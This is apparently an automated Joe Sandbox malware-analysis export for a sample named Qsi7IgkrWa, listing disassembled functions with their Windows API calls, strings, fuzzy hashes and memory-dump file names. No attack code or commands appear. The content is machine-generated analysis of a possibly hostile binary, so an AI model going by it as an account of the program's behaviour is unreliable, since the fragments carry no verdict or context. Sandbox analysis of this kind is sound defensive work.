Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 7778dc24692b2ad22e434f7d4b5b1eb14ac20eddae43b45d8fcd3185cb7ef385
Instruction ID: d86ba2da699503c87e76928a18f7777c96552a61b8dd004b60d54ec9b3a9a1d5
Opcode Fuzzy Hash: 7778dc24692b2ad22e434f7d4b5b1eb14ac20eddae43b45d8fcd3185cb7ef385
Instruction Fuzzy Hash: 29A0113008000A8ACE202B30CA0820C3B20EB20BC030002E8A00ACF0A2CB228A0B8A00

Function 00BCAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00BCAE72,C:\Users\user\Desktop,00000000,00BF946A,00000006), ref: 00BCAC08

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 9bd5921e8c43a9882bb87f4b58e6e25ea37c07c9d11515882d094a506442e985
Instruction ID: 4df2596af4ffabc268468036a6905a3c56346496aba572871a179476a195a34c
Opcode Fuzzy Hash: 9bd5921e8c43a9882bb87f4b58e6e25ea37c07c9d11515882d094a506442e985
Instruction Fuzzy Hash: 62A012301001408782000B318F4950E76956F51B01F01C038600085030CB30C820A501

Function 00BB9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00BB95D6,?,?,?,?,?,00BE2641,000000FF), ref: 00BB963B

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5be099b2bbb3c1f27cc6943887866e9cd87f01273dece9583321e21d0bdbb6c8
Instruction ID: 93b8fc8cf9fd283b0909592f643e67aae87788b72a458980b4c5849afb035a01
Opcode Fuzzy Hash: 5be099b2bbb3c1f27cc6943887866e9cd87f01273dece9583321e21d0bdbb6c8
Instruction Fuzzy Hash: D8F08971481B559FDB308E35C458BF277E8EB12321F041F9ED1E743AE0D7A1A98D8A40

Non-executed Functions

Function 00BCC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00BCC2B1
EndDialog.USER32(?,00000006), ref: 00BCC2C4
GetDlgItem.USER32(?,0000006C), ref: 00BCC2E0
SetFocus.USER32(00000000), ref: 00BCC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00BCC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00BCC358
FindFirstFileW.KERNEL32(?,?), ref: 00BCC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BCC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BCC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BCC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BCC3D4
_swprintf.LIBCMT ref: 00BCC404

Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00BCC417
FindClose.KERNEL32(00000000), ref: 00BCC41E
_swprintf.LIBCMT ref: 00BCC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00BCC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00BCC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00BCC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BCC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BCC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BCC509
_swprintf.LIBCMT ref: 00BCC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00BCC548
_swprintf.LIBCMT ref: 00BCC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00BCC5AF

Part of subcall function 00BCAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BCAF35
Part of subcall function 00BCAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BEE72C,?,?), ref: 00BCAF84

Strings

%s %s %s, xrefs: 00BCC3F2, 00BCC527
%s %s, xrefs: 00BCC469, 00BCC58E
REPLACEFILEDLG, xrefs: 00BCC247

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 1dadfe54f4bc81791ed740f7f83c60ad35fc303a8c62bde8f4e56dc4cd5919ee
Instruction ID: 6ec3a5999ca48fb2e9775c9727ae1393c1c8d31a06a9de9158e9e4f80a366ae5
Opcode Fuzzy Hash: 1dadfe54f4bc81791ed740f7f83c60ad35fc303a8c62bde8f4e56dc4cd5919ee
Instruction Fuzzy Hash: B4918472248384BBD2219BA0CC89FFF7BECEB5AB04F40485DF649D6091D771A6048762

Function 00BB6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB6FAA
_wcslen.LIBCMT ref: 00BB7013
_wcslen.LIBCMT ref: 00BB7084

Part of subcall function 00BB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BB7AAB
Part of subcall function 00BB7A9C: GetLastError.KERNEL32 ref: 00BB7AF1
Part of subcall function 00BB7A9C: CloseHandle.KERNEL32(?), ref: 00BB7B00

Part of subcall function 00BBA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00BB977F,?,?,00BB95CF,?,?,?,?,?,00BE2641,000000FF), ref: 00BBA1F1
Part of subcall function 00BBA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BB977F,?,?,00BB95CF,?,?,?,?,?,00BE2641), ref: 00BBA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00BB7139
CloseHandle.KERNEL32(00000000), ref: 00BB7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00BB7298

Part of subcall function 00BB9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BB73BC,?,?,?,00000000), ref: 00BB9DBC
Part of subcall function 00BB9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00BB9E70

Part of subcall function 00BB9620: CloseHandle.KERNELBASE(000000FF,?,?,00BB95D6,?,?,?,?,?,00BE2641,000000FF), ref: 00BB963B

Part of subcall function 00BBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA501
Part of subcall function 00BBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00BB6FCC
SeRestorePrivilege, xrefs: 00BB6FC2
UNC\, xrefs: 00BB7051
\??\, xrefs: 00BB702B

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 10041b6b72f25e91cb2db61f8093891b150174cddfdf0d3ab3090927d0eea0d8
Instruction ID: 5a2911708497375a54e08d075364d583ee8bc9ccd7e61db2af6f78d3a59e7edc
Opcode Fuzzy Hash: 10041b6b72f25e91cb2db61f8093891b150174cddfdf0d3ab3090927d0eea0d8
Instruction Fuzzy Hash: 2BC1D371944644ABDB25EB74CC85FFEB3E8EF44300F0045DAF956E7282DBB4AA448B61

Function 00BDD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00BDDA34

Strings

1#SNAN, xrefs: 00BDEC33
1#INF, xrefs: 00BDEC41
1#IND, xrefs: 00BDEC2C
1#QNAN, xrefs: 00BDEC3A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: b3a81deb0cddb968428518d6bf84b951ca35fd9f2175d0ebbb613bbeaec2120d
Instruction ID: 9f765d4e2513a8df1bb04579bda33074397710b60539b99017eeb3d8b7d60a3a
Opcode Fuzzy Hash: b3a81deb0cddb968428518d6bf84b951ca35fd9f2175d0ebbb613bbeaec2120d
Instruction Fuzzy Hash: 0EC22671E086298BDB25DE289D807EAB7F5EB44304F1541EBD45EEB340E779AE818F40

Function 00BB32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB3300
_swprintf.LIBCMT ref: 00BB36C7

Strings

hc%u, xrefs: 00BB370A
h%u, xrefs: 00BB36BC
CMT, xrefs: 00BB3A17

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 8b3828cb597790f983532d410a2945f6f6d16455bb970399062feae3c615e399
Instruction ID: 179562ffa577931f1daf26a45036b8186ba2d63beed2ad168d9c8a867660aa14
Opcode Fuzzy Hash: 8b3828cb597790f983532d410a2945f6f6d16455bb970399062feae3c615e399
Instruction Fuzzy Hash: E532B371514284AFDB14DF74C895AF93BE5EF15700F0804BDFD8A8B286DBB49A49CB60

Function 00BB286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB2874
_strlen.LIBCMT ref: 00BB2E3F

Part of subcall function 00BC02BA: __EH_prolog.LIBCMT ref: 00BC02BF

Part of subcall function 00BC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BBBAE9,00000000,?,?,?,0001044E), ref: 00BC1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB2F91

Strings

CMT, xrefs: 00BB2FBC

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: fa1212ea3f4d3157ecd9e4d202c018b994ff39344c5fbdbf41af3a61eb298b9f
Instruction ID: eaaeb5b3ea574aac1c9fddb51cd7485bda37e7162fd8980814cc518d1ae9a89b
Opcode Fuzzy Hash: fa1212ea3f4d3157ecd9e4d202c018b994ff39344c5fbdbf41af3a61eb298b9f
Instruction Fuzzy Hash: 5C62E8715002458FDB29DF38C8967FA7BE1EF55300F0845BEEC9A8B282DBB59945CB60

Function 00BCF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BCF844
IsDebuggerPresent.KERNEL32 ref: 00BCF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BCF930
UnhandledExceptionFilter.KERNEL32(?), ref: 00BCF93A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 10f2045d59b4dc40fbfe2853a6b8ae194de64ad5e52773e0f01dd21a0e690996
Instruction ID: 0527d0468310fb22e76d15dec0ac911154d51cc1182b910afdb76de3cc9dc412
Opcode Fuzzy Hash: 10f2045d59b4dc40fbfe2853a6b8ae194de64ad5e52773e0f01dd21a0e690996
Instruction Fuzzy Hash: B2310375D052199BDB20DFA4D989BDCBBF8EF08704F1041EEE40DAB250EB759A848F45

Function 00BCE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00BCE5E8,0000001C,00BCE7DD,00000000,?,?,?,?,?,?,?,00BCE5E8,00000004,00C11CEC,00BCE86D), ref: 00BCE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00BCE5E8,00000004,00C11CEC,00BCE86D), ref: 00BCE6CF

Strings

D, xrefs: 00BCE6C3

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: f03bfb7d44d3a0422344d569d4b83c25e8e549fbe2a113d8bb0b77772fc4b9f5
Instruction ID: 1be43748c4461c8027262d7ccb3ec324a3b97e8197ee2d55a64994c2d999bb4b
Opcode Fuzzy Hash: f03bfb7d44d3a0422344d569d4b83c25e8e549fbe2a113d8bb0b77772fc4b9f5
Instruction Fuzzy Hash: 4901F732600109ABDB14DE29DC49FED7BEAEFC4324F0CC169ED69DB150DA38ED058680

Function 00BD8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BD8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BD8FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00BD8FCC

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 0fe7076c7964c6516b871448b7df57bfd42989bfa3e48121f84553749a1af80b
Instruction ID: c8159c562519c235279d06b31ab120c9c26d7784bf29579fa9010200710922f7
Opcode Fuzzy Hash: 0fe7076c7964c6516b871448b7df57bfd42989bfa3e48121f84553749a1af80b
Instruction Fuzzy Hash: C231C275901229ABCB21DF64DC89B9DBBF8EF08310F5041EAE41CA7250EB749F858F45

Function 00BDD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 0f0753119b3dda4e13db51087fdc2c4d9c1ebc76bbe77122a48953ffb88a4b00
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: E7022C71E002199BDF14CFA9D8806ADF7F1EF48314F2582AAD959E7380E731AE41CB90

Function 00BCAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BCAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00BEE72C,?,?), ref: 00BCAF84

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 3c9ff727ec0caf5be2e98983beb46c718621fdb8c8cad10d2444b16feb91755b
Instruction ID: 737b4c0316187be075f56991b7049f5adbed835fe88197082c508702d948c0bb
Opcode Fuzzy Hash: 3c9ff727ec0caf5be2e98983beb46c718621fdb8c8cad10d2444b16feb91755b
Instruction Fuzzy Hash: 1001717A200348AAD7209F64DC45F9B77FCEF09710F00406AFA15EB190D7709955CBA5

Function 00BB6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00BB6DDF,00000000,00000400), ref: 00BB6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00BB6C95

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
